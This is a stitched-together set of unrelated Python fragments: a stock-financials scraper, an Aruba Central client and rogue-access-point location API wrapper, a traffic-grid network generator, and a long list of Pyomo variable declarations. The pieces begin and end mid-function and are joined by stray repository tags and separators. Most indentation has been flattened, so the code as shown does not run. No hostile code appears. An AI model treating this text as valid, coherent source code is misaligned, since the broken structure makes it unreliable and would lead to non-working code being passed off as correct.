industry = industry.replace("—", " - ")
industry = industry.replace("/", " ")
similars = fd.select_equities(sector=sector, industry=industry)
# This filters similars to match market cap and removes ticker analyzed
if ticker in similars:
market_cap = similars[ticker]["market_cap"]
similars.pop(ticker, None)
if not no_filter:
similars = {
k: v for (k, v) in similars.items() if v["market_cap"] == market_cap
}
similars = list(similars)
return similars
def create_dataframe(ticker: str, statement: str, period: str = "annual"):
"""
Creates a df financial statement for a given ticker
Parameters
----------
ticker : str
The ticker to create a dataframe for
statement : str
The financial statement dataframe to create
period : str
Whether to look at annual, quarterly, or trailing
Returns
-------
statement : pd.DataFrame
The financial statement requested
rounding : int
The amount of rounding to use
statement_currency: str
The currency the financial statements are reported in
"""
if statement not in ["BS", "CF", "IS"]:
raise ValueError("statement variable must be 'BS','CF', or 'IS'")
if period not in ["annual", "quarterly", "trailing"]:
raise ValueError(
"statement variable must be 'annual','quarterly', or 'trailing'"
)
per_url = f"{period}/" if period != "annual" else ""
URL = f"https://stockanalysis.com/stocks/{ticker}/financials/"
URL += dcf_static.statement_url[statement] + per_url
ignores = dcf_static.statement_ignore[statement]
r = requests.get(URL, headers=dcf_static.headers)
if "404 - Page Not Found" in r.text:
return pd.DataFrame(), None, None
try:
df = pd.read_html(r.text)[0]
except ValueError:
return pd.DataFrame(), None, None
soup = BeautifulSoup(r.content, "html.parser")
phrase = soup.find("div", attrs={"class": "info-long svelte-f7kao3"})
phrase = phrase.get_text().lower() if phrase else ""
if "thousand" in phrase:
rounding = 1_000
elif "millions" in phrase:
rounding = 1_000_000
elif "billions" in phrase:
rounding = 1_000_000_000
else:
return pd.DataFrame(), None, None
    statement_currency = None
    for currency in CURRENCIES:
if currency.lower() in phrase:
statement_currency = currency
break
df = df.set_index("Year")
df = df.loc[:, ~(df == "Upgrade").any()]
for ignore in ignores:
if ignore in df.index:
df = df.drop([ignore])
df = df[df.columns[::-1]]
if statement == "IS":
vals = ["Revenue", dcf_static.gaap_is]
elif statement == "BS":
vals = ["Cash & Equivalents", dcf_static.gaap_bs]
elif statement == "CF":
vals = ["Net Income", dcf_static.gaap_cf]
if vals[0] in df.index:
blank_list = ["0" for _ in df.loc[vals[0]].to_list()]
else:
return pd.DataFrame(), None, None
for i, _ in enumerate(vals[1][1:]):
df = insert_row(vals[1][i + 1], vals[1][i], df, blank_list)
return df, rounding, statement_currency
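# For example, create_dataframe("AAPL", "IS") scrapes the annual income
# statement from stockanalysis.com and returns it together with the rounding
# factor (e.g. 1_000_000 when figures are reported in millions) and the
# reporting currency.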
@log_start_end(log=logger)
def get_similar_dfs(ticker: str, info: Dict[str, Any], n: int, no_filter: bool = False):
"""
Get dataframes for similar companies
Parameters
----------
ticker : str
The ticker to create a dataframe for
    info : Dict[str,Any]
The dictionary produced from the yfinance.info function
n : int
The number of similar companies to produce
no_filter : bool
True means that we do not filter based on market cap
Returns
-------
    new_list : List[list]
        A list of [ticker, [BS, IS, CF dataframes]] entries for similar
        companies
"""
similars = others_in_sector(ticker, info["sector"], info["industry"], no_filter)
i = 0
new_list = []
while i < n and similars:
similar_ret = [create_dataframe(similars[0], x)[0] for x in ["BS", "IS", "CF"]]
blank = [x.empty for x in similar_ret]
if True not in blank:
vals = [similars[0], similar_ret]
new_list.append(vals)
i += 1
similars.pop(0)
return new_list
@log_start_end(log=logger)
def clean_dataframes(*args) -> List[pd.DataFrame]:
"""
    All dataframes in the list take on the length
<reponame>karthikeyan-dhandapani/pycentral
# MIT License
#
# Copyright (c) 2020 Aruba, a Hewlett Packard Enterprise company
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from pycentral.url_utils import UrlObj
from pycentral.base_utils import console_logger
urls = UrlObj()
class ClientLocation(object):
"""A python class to obtain client location based on visualRF floor map.
"""
def get_client_location(self, conn, macaddr: str, offset=0, limit=100, units="FEET"):
"""Get location of a client. This function provides output only when visualRF is
configured in Aruba Central.
:param conn: Instance of class:`pycentral.ArubaCentralBase` to make an API call.
:type conn: class:`pycentral.ArubaCentralBase`
:param macaddr: Provide a macaddr of a client. For example "ac:bb:cc:dd:ec:10"
:type macaddr: str
        :param offset: Pagination start index, defaults to 0
        :type offset: int, optional
        :param limit: Pagination size (max 100), defaults to 100
:type limit: int, optional
:param units: METERS or FEET, defaults to "FEET"
:type units: str, optional
:return: Response as provided by 'command' function in class:`pycentral.ArubaCentralBase`
:rtype: dict
"""
path = urls.urlJoin(urls.CLIENT_LOCATION["GET_CLIENT_LOC"], macaddr)
params = {
"offset": offset,
"limit": limit,
"units": units
}
resp = conn.command(apiMethod="GET", apiPath=path, apiParams=params)
return resp
def get_floor_clients(self, conn, floor_id: str, offset=0, limit=100, units="FEET"):
"""Get location of clients within a floormap in Aruba Central visualRF.
:param conn: Instance of class:`pycentral.ArubaCentralBase` to make an API call.
:type conn: class:`pycentral.ArubaCentralBase`
:param floor_id: Provide floor_id returned by `get_building_floors()` function in
class:`FloorPlan`
:type floor_id: str
        :param offset: Pagination start index, defaults to 0
        :type offset: int, optional
        :param limit: Pagination size (max 100), defaults to 100
:type limit: int, optional
:param units: METERS or FEET, defaults to "FEET"
:type units: str, optional
:return: Response as provided by 'command' function in class:`pycentral.ArubaCentralBase`
:rtype: dict
"""
path = urls.urlJoin(urls.CLIENT_LOCATION["GET_FLOOR_CLIENTS"], floor_id, "client_location")
params = {
"offset": offset,
"limit": limit,
"units": units
}
resp = conn.command(apiMethod="GET", apiPath=path, apiParams=params)
return resp
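# Illustrative usage (a sketch; assumes an authenticated ArubaCentralBase
# instance named `central` has been created elsewhere with pycentral):
#   client_loc = ClientLocation()
#   resp = client_loc.get_client_location(central, macaddr="ac:bb:cc:dd:ec:10",
#                                         units="METERS")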
class RougueLocation(object):
"""A python class to obtain location of rogue access points
"""
def get_rogueap_location(self, conn, macaddr: str, offset=0, limit=100, units="FEET"):
"""Get location of rogue a access point based on its Mac Address
:param conn: Instance of class:`pycentral.ArubaCentralBase` to make an API call.
:type conn: class:`pycentral.ArubaCentralBase`
:param macaddr: Provide Mac Address of an Access Point
:type macaddr: str
        :param offset: Pagination start index, defaults to 0
        :type offset: int, optional
        :param limit: Pagination size (max 100), defaults to 100
:type limit: int, optional
:param units: METERS or FEET, defaults to "FEET"
:type units: str, optional
:return: Response as provided by 'command' function in class:`pycentral.ArubaCentralBase`
:rtype: dict
"""
path = urls.urlJoin(urls.ROGUE_LOCATION["GET_AP_LOC"], macaddr)
params = {
"offset": offset,
"limit": limit,
"units": units
}
resp = conn.command(apiMethod="GET", apiPath=path, apiParams=params)
return resp
def get_floor_rogueaps(self, conn, floor_id: str, offset=0, limit=100, units="FEET"):
"""Get rogue access points within a floor
:param conn: Instance of class:`pycentral.ArubaCentralBase` to make an API call.
:type conn: class:`pycentral.ArubaCentralBase`
:param floor_id: Provide floor id. Can be obtained from `get_building_floors()` within
class:`FloorPlan`
:type floor_id: str
        :param offset: Pagination start index, defaults to 0
        :type offset: int, optional
        :param limit: Pagination size (max 100), defaults to 100
:type limit: int, optional
:param units: METERS or FEET, defaults to "FEET"
:type units: str, optional
:return: Response as provided by 'command' function in class:`pycentral.ArubaCentralBase`
:rtype: dict
"""
path = urls.urlJoin(urls.ROGUE_LOCATION["GET_FLOOR_APS"], floor_id)
params = {
"offset": offset,
"limit": limit,
"units": units
}
resp = conn.command(apiMethod="GET", apiPath=path, apiParams=params)
return resp
class FloorPlan(object):
"""A Python class to obtain information of floorplan in Aruba Central visualRF.
"""
def get_campus_list(self, conn, offset=0, limit=100):
"""Get list of campuses in visualRF floorplan
:param conn: Instance of class:`pycentral.ArubaCentralBase` to make an API call.
:type conn: class:`pycentral.ArubaCentralBase`
        :param offset: Pagination start index, defaults to 0
        :type offset: int, optional
        :param limit: Pagination size (max 100), defaults to 100
:type limit: int, optional
:return: Response as provided by 'command' function in class:`pycentral.ArubaCentralBase`
:rtype: dict
"""
path = urls.FLOOR_PLAN["GET_CAMPUS_LIST"]
params = {
"offset": offset,
"limit": limit
}
resp = conn.command(apiMethod="GET", apiPath=path, apiParams=params)
return resp
def get_campus_buildings(self, conn, campus_id: str, offset=0, limit=100):
"""Get campus info and buildings within the campus
:param conn: Instance of class:`pycentral.ArubaCentralBase` to make an API call.
:type conn: class:`pycentral.ArubaCentralBase`
:param campus_id: Provide campus id. Can be obtained from `get_campus_list` function in
class:`FloorPlan`
:type campus_id: str
        :param offset: Pagination start index, defaults to 0
        :type offset: int, optional
        :param limit: Pagination size (max 100), defaults to 100
:type limit: int, optional
:return: Response as provided by 'command' function in class:`pycentral.ArubaCentralBase`
:rtype: dict
"""
path = urls.urlJoin(urls.FLOOR_PLAN["GET_CAMPUS_INFO"], campus_id)
params = {
"offset": offset,
"limit": limit
}
resp = conn.command(apiMethod="GET", apiPath=path, apiParams=params)
return resp
def get_building_floors(self, conn, building_id: str, offset=0, limit=100, units="FEET"):
"""Get building info and floors within the building
:param conn: Instance of class:`pycentral.ArubaCentralBase` to make an API call.
:type conn: class:`pycentral.ArubaCentralBase`
:param building_id: Provide building id. Can be obtained from `get_campus_buildings` within
class:`FloorPlan`
:type building_id: str
        :param offset: Pagination start index, defaults to 0
        :type offset: int, optional
        :param limit: Pagination size (max 100), defaults to 100
:type limit: int, optional
:param units: METERS or FEET, defaults to "FEET"
:type units: str, optional
:return: Response as provided by 'command' function in class:`pycentral.ArubaCentralBase`
:rtype: dict
"""
path = urls.urlJoin(urls.FLOOR_PLAN["GET_BUILDING_INFO"], building_id)
params = {
"offset": offset,
"limit": limit,
"units": units
}
resp = conn.command(apiMethod="GET", apiPath=path, apiParams=params)
return resp
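    # Illustrative drill-down (a sketch): the ids chain together, e.g.
    #   fp = FloorPlan()
    #   campuses = fp.get_campus_list(central)
    #   buildings = fp.get_campus_buildings(central, campus_id)
    #   floors = fp.get_building_floors(central, building_id)
    # where each id is read out of the previous call's response.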
def get_floor_info(self, conn, floor_id: str, offset=0, limit=100, units="FEET"):
"""Get floor information
:param conn: Instance of class:`pycentral.ArubaCentralBase` to make an API call.
:type conn: class:`pycentral.ArubaCentralBase`
:param floor_id: Provide floor id. Can be obtained from `get_building_floors()` within
class:`FloorPlan`
:type floor_id: str
        :param offset: Pagination start index, defaults to 0
        :type offset: int, optional
        :param limit: Pagination size (max 100), defaults to 100
:type limit: int, optional
:param units: METERS or FEET, defaults to "FEET"
:type units: str, optional
:return: Response as provided by 'command' function in class:`pycentral.ArubaCentralBase`
:rtype: dict
"""
path = urls.urlJoin(urls.FLOOR_PLAN["GET_FLOOR_INFO"], floor_id)
params = {
"offset": offset,
"limit": limit,
"units": units
}
resp = conn.command(apiMethod="GET", apiPath=path, apiParams=params)
return resp
def get_floor_image(self, conn, floor_id, offset=0, limit=100):
"""Get Floor's background image in base64 format
:param conn: Instance of class:`pycentral.ArubaCentralBase` to make an API call.
:type conn: class:`pycentral.ArubaCentralBase`
:param floor_id: Provide floor id. Can be obtained from `get_building_floors()` within
class:`FloorPlan`
:type floor_id: str
        :param offset: Pagination start index, defaults to 0
        :type offset: int, optional
        :param limit: Pagination size (max 100), defaults to 100
:type limit: int, optional
:return: Response as provided by 'command' function in class:`pycentral.ArubaCentralBase`
:rtype: dict
"""
path = urls.urlJoin(urls.FLOOR_PLAN["GET_FLOOR_IMG"], floor_id, "image")
params = {
"offset": offset,
"limit": limit
}
resp = conn.command(apiMethod="GET", apiPath=path, apiParams=params)
return resp
def get_floor_aps(self, conn, floor_id, offset=0, limit=100, units="FEET"):
"""Get access points within a floor
:param conn: Instance of class:`pycentral.ArubaCentralBase` to make an API call.
:type conn: class:`pycentral.ArubaCentralBase`
:param floor_id: Provide floor id. Can be obtained from `get_building_floors()` within
class:`FloorPlan`
:type floor_id: str
        :param offset: Pagination start index, defaults to 0
        :type offset: int, optional
        :param limit: Pagination size (max 100), defaults to 100
:type limit: int, optional
        :param
from flow.core.generator import Generator
from collections import defaultdict
from lxml import etree
E = etree.Element
class SimpleGridGenerator(Generator):
"""Generator for nxm grid networks."""
def __init__(self, net_params, base):
super().__init__(net_params, base)
# this is a dictionary containing inner length, long outer length,
# short outer length, and number of rows and columns
self.grid_array = net_params.additional_params["grid_array"]
self.node_mapping = defaultdict(list)
self.name = "BobLoblawsLawBlog" # DO NOT CHANGE
def specify_nodes(self, net_params):
nodes = []
nodes += self._build_inner_nodes()
nodes += self._build_outer_nodes()
return nodes
def specify_tll(self, net_params):
return self._build_inner_nodes()
def specify_edges(self, net_params):
edges = []
edges += self._build_inner_edges()
edges += self._build_outer_edges()
# Sort node_mapping in counterclockwise order
self._order_nodes()
return edges
def specify_routes(self, net_params):
rts = {}
row_num = self.grid_array["row_num"]
col_num = self.grid_array["col_num"]
for i in range(row_num):
route_arr_bot = []
route_arr_top = []
for j in range(col_num + 1):
route_arr_bot += ["bot" + str(i) + '_' + str(j)]
route_arr_top += ["top" + str(i) + '_' + str(col_num - j)]
rts.update({"bot" + str(i) + '_' + '0': route_arr_bot})
rts.update({"top" + str(i) + '_' + str(col_num): route_arr_top})
for i in range(col_num):
route_arr_left = []
route_arr_right = []
for j in range(row_num + 1):
route_arr_right += ["right" + str(j) + '_' + str(i)]
route_arr_left += ["left" + str(row_num - j) + '_' + str(i)]
rts.update({"left" + str(row_num) + '_' + str(i): route_arr_left})
rts.update({"right" + '0' + '_' + str(i): route_arr_right})
return rts
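    # For example, in a 2x2 grid the bottom route of row 0 is
    # rts["bot0_0"] = ["bot0_0", "bot0_1", "bot0_2"]: col_num + 1 edges
    # traversed left to right.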
def specify_types(self, net_params):
add_params = net_params.additional_params
horizontal_lanes = add_params["horizontal_lanes"]
vertical_lanes = add_params["vertical_lanes"]
if isinstance(add_params["speed_limit"], int) or \
isinstance(add_params["speed_limit"], float):
speed_limit = {"horizontal": add_params["speed_limit"],
"vertical": add_params["speed_limit"]}
else:
speed_limit = add_params["speed_limit"]
types = [{"id": "horizontal", "numLanes": repr(horizontal_lanes),
"speed": repr(speed_limit["horizontal"])},
{"id": "vertical", "numLanes": repr(vertical_lanes),
"speed": repr(speed_limit["vertical"])}]
return types
# ===============================
# ============ UTILS ============
# ===============================
def _build_inner_nodes(self):
"""Build out the inner nodes of the system.
        The nodes are numbered from the bottom left, increasing first across
        the columns and then across the rows. For example, in a 2x2 grid
        (row_num = col_num = 2) there are four inner nodes: the bottom left is
        0, the bottom right is 1, the top left is 2 and the top right is 3.
        The coordinate of the bottom left inner node is (0, 0).
        Returns
------
list <dict>
List of inner nodes
"""
tls = self.net_params.additional_params.get("traffic_lights", True)
node_type = "traffic_light" if tls else "priority"
row_num = self.grid_array["row_num"]
col_num = self.grid_array["col_num"]
inner_length = self.grid_array["inner_length"]
nodes = []
# sweep up across columns
for i in range(row_num):
# sweep across rows
for j in range(col_num):
index = i * col_num + j
x_center = j * inner_length
y_center = i * inner_length
nodes.append({"id": "center" + str(index),
"x": repr(x_center),
"y": repr(y_center),
"type": node_type})
return nodes
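    # For example, with row_num=2 and col_num=3 the node directly above the
    # bottom-left corner is "center3", since index = i * col_num + j = 1*3 + 0.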
def _build_outer_nodes(self):
"""Builds out the column nodes.
There are two in each column below the bottom row, and two in each
column above the top row. They are numbered with regards to the column
they are in. The bottom are labeled "bot_col_short" and "bot_col_long".
Top are named similarly. We then repeat the same process for the outer
row nodes
        Returns
------
list <dict>
List of column, row nodes
"""
col_num = self.grid_array["col_num"]
row_num = self.grid_array["row_num"]
inner_length = self.grid_array["inner_length"]
short_length = self.grid_array["short_length"]
long_length = self.grid_array["long_length"]
nodes = []
for i in range(col_num):
# build the bottom nodes
nodes += [
{
"id": "bot_col_short" + str(i),
"x": repr(i * inner_length),
"y": repr(-short_length),
"type": "priority"
},
{
"id": "bot_col_long" + str(i),
"x": repr(i * inner_length),
"y": repr(-long_length),
"type": "priority"
}
]
# build the top nodes
nodes += [
{
"id": "top_col_short" + str(i),
"x": repr(i * inner_length),
"y": repr((row_num - 1) * inner_length + short_length),
"type": "priority"
},
{
"id": "top_col_long" + str(i),
"x": repr(i * inner_length),
"y": repr((row_num - 1) * inner_length + long_length),
"type": "priority"
}
]
for i in range(row_num):
# build the left nodes
nodes += [
{
"id": "left_row_short" + str(i),
"x": repr(-short_length),
"y": repr(i * inner_length),
"type": "priority"
},
{
"id": "left_row_long" + str(i),
"x": repr(-long_length),
"y": repr(i * inner_length),
"type": "priority"
}
]
# build the right nodes
nodes += [
{
"id": "right_row_short" + str(i),
"x": repr((col_num - 1) * inner_length + short_length),
"y": repr(i * inner_length),
"type": "priority"
},
{
"id": "right_row_long" + str(i),
"x": repr((col_num - 1) * inner_length + long_length),
"y": repr(i * inner_length),
"type": "priority"
}
]
return nodes
def _build_inner_edges(self):
"""Builds the inner edges.
        First we build all of the horizontal (row) edges. These are named
        top_i_j or bot_i_j, where i is the row number and j is the column to
        the right of the edge.
        For the vertical (column) edges the notation is right_i_j or left_i_j,
        where i is the row above the edge and j is the column number.
        INDEXED FROM ZERO.
"""
row_num = self.grid_array["row_num"]
col_num = self.grid_array["col_num"]
inner_length = self.grid_array["inner_length"]
edges = []
# Build the horizontal edges
for i in range(row_num):
for j in range(col_num - 1):
node_index = i * col_num + j
index = "{}_{}".format(i, j+1)
self.node_mapping["center{}".format(node_index+1)].append(
"bot" + index)
self.node_mapping["center{}".format(node_index)].append(
"top" + index)
edges += [
{
"id": "top" + index,
"type": "horizontal",
"priority": "78",
"from": "center" + str(node_index + 1),
"to": "center" + str(node_index),
"length": repr(inner_length)
},
{
"id": "bot" + index,
"type": "horizontal",
"priority": "78",
"from": "center" + str(node_index),
"to": "center" + str(node_index + 1),
"length": repr(inner_length)
}
]
# Build the vertical edges
for i in range(row_num - 1):
for j in range(col_num):
node_index_bot = i * col_num + j
node_index_top = (i + 1) * col_num + j
index = str(i + 1) + '_' + str(j)
self.node_mapping["center{}".format(node_index_top)].append(
"right" + index)
self.node_mapping["center{}".format(node_index_bot)].append(
"left" + index)
edges += [
{
"id": "right" + index,
"type": "vertical",
"priority": "78",
"from": "center" + str(node_index_bot),
"to": "center" + str(node_index_top),
"length": repr(inner_length)
},
{
"id": "left" + index,
"type": "vertical",
"priority": "78",
"from": "center" + str(node_index_top),
"to": "center" + str(node_index_bot),
"length": repr(inner_length)
}
]
return edges
def _build_outer_edges(self):
"""Builds the outer edges.
Starts with the bottom edges, then the top edges, then the left edges,
then the right.
        Returns
------
list <dict>
List of outer edges
"""
row_num = self.grid_array["row_num"]
col_num = self.grid_array["col_num"]
short_length = self.grid_array["short_length"]
long_length = self.grid_array["long_length"]
edges = []
# create dictionary of node to edges that go to it
for i in range(col_num):
index = '0_' + str(i)
# bottom edges
self.node_mapping["center" + str(i)].append("right" + index)
edges += [
{
"id": "right" + index,
"type": "vertical",
"priority": "78",
"from": "bot_col_short" + str(i),
"to": "center" + str(i),
"length": repr(short_length)
},
{
"id": "left" + index,
"type": "vertical",
"priority": "78",
"from": "center" + str(i),
"to": "bot_col_long" + str(i),
"length": repr(long_length)
}
]
# top edges
index = str(row_num) + '_' + str(i)
center_start = (row_num - 1) * col_num
self.node_mapping["center" + str(center_start + i)].append(
"left" + index)
edges += [
{
"id": "left" + index,
"type": "vertical",
"priority": "78",
"from": "top_col_short" + str(i),
"to": "center" + str(center_start + i),
"length": repr(short_length)
},
{
"id": "right" + index,
"type": "vertical",
"priority": "78",
"from": "center" + str(center_start + i),
"to": "top_col_long" + str(i),
"length": repr(long_length)
}
]
# build the left and then the right edges
for j in range(row_num):
index = str(j) + '_0'
# left edges
self.node_mapping["center" + str(j*col_num)].append("bot" + index)
edges += [
{
"id": "bot" + index,
"type": "horizontal",
"priority": "78",
"from": "left_row_short" + str(j),
"to": "center" + str(j * col_num),
"length": repr(short_length)
},
{
"id": "top" + index,
"type": "horizontal",
"priority": "78",
"from": "center" + str(j * col_num),
"to": "left_row_long" + str(j),
"length": repr(long_length)
}
]
# right edges
index = str(j) + '_' + str(col_num)
center_index = (j * col_num) + col_num - 1
self.node_mapping["center"+str(center_index)].append("top"+index)
edges += [
{
"id": "top" + index,
"type": "horizontal",
"priority": "78",
"from": "right_row_short" + str(j),
"to": "center" + str(center_index),
"length": repr(short_length)
},
{
"id": "bot" + index,
"type": "horizontal",
"priority": "78",
"from": "center" + str(center_index),
"to": "right_row_long" + str(j),
"length": repr(long_length)
}
]
return edges
def _order_nodes(self):
for node | |
= Var(within=Reals,bounds=(0,None),initialize=0.2801968386)
m.x3157 = Var(within=Reals,bounds=(0,None),initialize=0.733594)
m.x3158 = Var(within=Reals,bounds=(0,None),initialize=0.820376)
m.x3159 = Var(within=Reals,bounds=(0,None),initialize=0.26446572658)
m.x3160 = Var(within=Reals,bounds=(0,None),initialize=0.36459279861)
m.x3161 = Var(within=Reals,bounds=(0,None),initialize=0.45401585246191)
m.x3162 = Var(within=Reals,bounds=(0,None),initialize=0.016128)
m.x3163 = Var(within=Reals,bounds=(0,None),initialize=0.057645288)
m.x3164 = Var(within=Reals,bounds=(0,None),initialize=0.550605149)
m.x3165 = Var(within=Reals,bounds=(0,None),initialize=1.3445426516)
m.x3166 = Var(within=Reals,bounds=(0,None),initialize=1.796832)
m.x3167 = Var(within=Reals,bounds=(0,None),initialize=1.973556551225)
m.x3168 = Var(within=Reals,bounds=(0,None),initialize=0.206376)
m.x3169 = Var(within=Reals,bounds=(0,None),initialize=0.69003631)
m.x3170 = Var(within=Reals,bounds=(0,None),initialize=1.85961062)
m.x3171 = Var(within=Reals,bounds=(0,None),initialize=0.301797)
m.x3172 = Var(within=Reals,bounds=(0,None),initialize=0.377093)
m.x3173 = Var(within=Reals,bounds=(0,None),initialize=0.048483)
m.x3174 = Var(within=Reals,bounds=(0,None),initialize=3.919623)
m.x3175 = Var(within=Reals,bounds=(0,None),initialize=1.010851)
m.x3176 = Var(within=Reals,bounds=(0,None),initialize=0.96210313818246)
m.x3177 = Var(within=Reals,bounds=(0,None),initialize=17.010810057992)
m.x3178 = Var(within=Reals,bounds=(0,None),initialize=0.001657)
m.x3179 = Var(within=Reals,bounds=(0,None),initialize=0.003)
m.x3180 = Var(within=Reals,bounds=(0,None),initialize=0.867817)
m.x3181 = Var(within=Reals,bounds=(0,None),initialize=0.8380421)
m.x3182 = Var(within=Reals,bounds=(0,None),initialize=0.4643778)
m.x3183 = Var(within=Reals,bounds=(0,None),initialize=0.598005)
m.x3184 = Var(within=Reals,bounds=(0,None),initialize=0.067617)
m.x3185 = Var(within=Reals,bounds=(0,None),initialize=0.00372960573385935)
m.x3186 = Var(within=Reals,bounds=(0,None),initialize=0.0401850390889487)
m.x3187 = Var(within=Reals,bounds=(0,None),initialize=0.160617992804942)
m.x3188 = Var(within=Reals,bounds=(0,None),initialize=0.314291634314725)
m.x3189 = Var(within=Reals,bounds=(0,None),initialize=0.0124974914075008)
m.x3190 = Var(within=Reals,bounds=(0,None),initialize=0.154267427901957)
m.x3191 = Var(within=Reals,bounds=(0,None),initialize=0.0052963520787978)
m.x3192 = Var(within=Reals,bounds=(0,None),initialize=0.0971128924162473)
m.x3193 = Var(within=Reals,bounds=(0,None),initialize=0.056183983490731)
m.x3194 = Var(within=Reals,bounds=(0,None),initialize=0.106606693358826)
m.x3195 = Var(within=Reals,bounds=(0,None),initialize=0.238115076231716)
m.x3196 = Var(within=Reals,bounds=(0,None),initialize=0.834418589810566)
m.x3197 = Var(within=Reals,bounds=(0,None),initialize=0.837237)
m.x3198 = Var(within=Reals,bounds=(0,None),initialize=30.88885)
m.x3199 = Var(within=Reals,bounds=(0,None),initialize=0.002039)
m.x3200 = Var(within=Reals,bounds=(0,None),initialize=0.092048)
m.x3201 = Var(within=Reals,bounds=(0,None),initialize=0.10583)
m.x3202 = Var(within=Reals,bounds=(0,None),initialize=1.18953)
m.x3203 = Var(within=Reals,bounds=(0,None),initialize=1.392856)
m.x3204 = Var(within=Reals,bounds=(0,None),initialize=0.169569)
m.x3205 = Var(within=Reals,bounds=(0,None),initialize=0.898689)
m.x3206 = Var(within=Reals,bounds=(0,None),initialize=0.0323711716535549)
m.x3207 = Var(within=Reals,bounds=(0,None),initialize=0.711985)
m.x3208 = Var(within=Reals,bounds=(0,None),initialize=0.0257540749)
m.x3209 = Var(within=Reals,bounds=(0,None),initialize=0.0639535943)
m.x3210 = Var(within=Reals,bounds=(0,None),initialize=0.11946748)
m.x3211 = Var(within=Reals,bounds=(0,None),initialize=0.348375638894449)
m.x3212 = Var(within=Reals,bounds=(0,None),initialize=0.018807821)
m.x3213 = Var(within=Reals,bounds=(0,None),initialize=0.17366008)
m.x3214 = Var(within=Reals,bounds=(0,None),initialize=0.4408847888)
m.x3215 = Var(within=Reals,bounds=(0,None),initialize=0.41979766)
m.x3216 = Var(within=Reals,bounds=(0,None),initialize=0.166015)
m.x3217 = Var(within=Reals,bounds=(0,None),initialize=0.75507590019)
m.x3218 = Var(within=Reals,bounds=(0,None),initialize=0.06667129632)
m.x3219 = Var(within=Reals,bounds=(0,None),initialize=0.02390003232)
m.x3220 = Var(within=Reals,bounds=(0,None),initialize=0.889199)
m.x3221 = Var(within=Reals,bounds=(0,None),initialize=2.56598)
m.x3222 = Var(within=Reals,bounds=(0,None),initialize=0.850837)
m.x3223 = Var(within=Reals,bounds=(0,None),initialize=0.765673)
m.x3224 = Var(within=Reals,bounds=(0,None),initialize=0.166026)
m.x3225 = Var(within=Reals,bounds=(0,None),initialize=8.58992245423785)
m.x3226 = Var(within=Reals,bounds=(0,None),initialize=0.32664961308465)
m.x3227 = Var(within=Reals,bounds=(0,None),initialize=0.031157)
m.x3228 = Var(within=Reals,bounds=(0,None),initialize=0.337803)
m.x3229 = Var(within=Reals,bounds=(0,None),initialize=1.4968645)
m.x3230 = Var(within=Reals,bounds=(0,None),initialize=1.0723521)
m.x3231 = Var(within=Reals,bounds=(0,None),initialize=0.1794015)
m.x3232 = Var(within=Reals,bounds=(0,None),initialize=0.03537)
m.x3233 = Var(within=Reals,bounds=(0,None),initialize=0.047224)
m.x3234 = Var(within=Reals,bounds=(0,None),initialize=0.00339720287392297)
m.x3235 = Var(within=Reals,bounds=(0,None),initialize=0.0366035286363681)
m.x3236 = Var(within=Reals,bounds=(0,None),initialize=0.146302838878375)
m.x3237 = Var(within=Reals,bounds=(0,None),initialize=0.286280245027153)
m.x3238 = Var(within=Reals,bounds=(0,None),initialize=0.0113836466254184)
m.x3239 = Var(within=Reals,bounds=(0,None),initialize=0.140518271050308)
m.x3240 = Var(within=Reals,bounds=(0,None),initialize=0.00482431221618192)
m.x3241 = Var(within=Reals,bounds=(0,None),initialize=0.0884576603409654)
m.x3242 = Var(within=Reals,bounds=(0,None),initialize=0.0511765596160332)
m.x3243 = Var(within=Reals,bounds=(0,None),initialize=0.0971053218226534)
m.x3244 = Var(within=Reals,bounds=(0,None),initialize=0.216892958404401)
m.x3245 = Var(within=Reals,bounds=(0,None),initialize=0.760050641713784)
m.x3246 = Var(within=Reals,bounds=(0,None),initialize=0.8307)
m.x3247 = Var(within=Reals,bounds=(0,None),initialize=0.78878076270671)
m.x3248 = Var(within=Reals,bounds=(0,None),initialize=0.0965103137186489)
m.x3249 = Var(within=Reals,bounds=(0,None),initialize=1.02351445057984)
m.x3250 = Var(within=Reals,bounds=(0,None),initialize=0.11684)
m.x3251 = Var(within=Reals,bounds=(0,None),initialize=0.199507)
m.x3252 = Var(within=Reals,bounds=(0,None),initialize=0.168241)
m.x3253 = Var(within=Reals,bounds=(0,None),initialize=0.052262056)
m.x3254 = Var(within=Reals,bounds=(0,None),initialize=0.05417050096)
m.x3255 = Var(within=Reals,bounds=(0,None),initialize=0.657434166259682)
m.x3256 = Var(within=Reals,bounds=(0,None),initialize=0.011139125)
m.x3257 = Var(within=Reals,bounds=(0,None),initialize=0.021414)
m.x3258 = Var(within=Reals,bounds=(0,None),initialize=0.24162118)
m.x3259 = Var(within=Reals,bounds=(0,None),initialize=0.417857)
m.x3260 = Var(within=Reals,bounds=(0,None),initialize=0.385335)
m.x3261 = Var(within=Reals,bounds=(0,None),initialize=0.327300211885)
m.x3262 = Var(within=Reals,bounds=(0,None),initialize=0.113598)
m.x3263 = Var(within=Reals,bounds=(0,None),initialize=0.2449074)
m.x3264 = Var(within=Reals,bounds=(0,None),initialize=0.207387)
m.x3265 = Var(within=Reals,bounds=(0,None),initialize=0.135954)
m.x3266 = Var(within=Reals,bounds=(0,None),initialize=0.7440609730878)
m.x3267 = Var(within=Reals,bounds=(0,None),initialize=0.0048929009094)
m.x3268 = Var(within=Reals,bounds=(0,None),initialize=4.827416)
m.x3269 = Var(within=Reals,bounds=(0,None),initialize=0.061566)
m.x3270 = Var(within=Reals,bounds=(0,None),initialize=0.161833)
m.x3271 = Var(within=Reals,bounds=(0,None),initialize=4.5723542)
m.x3272 = Var(within=Reals,bounds=(0,None),initialize=0.1751165)
m.x3273 = Var(within=Reals,bounds=(0,None),initialize=32.73651)
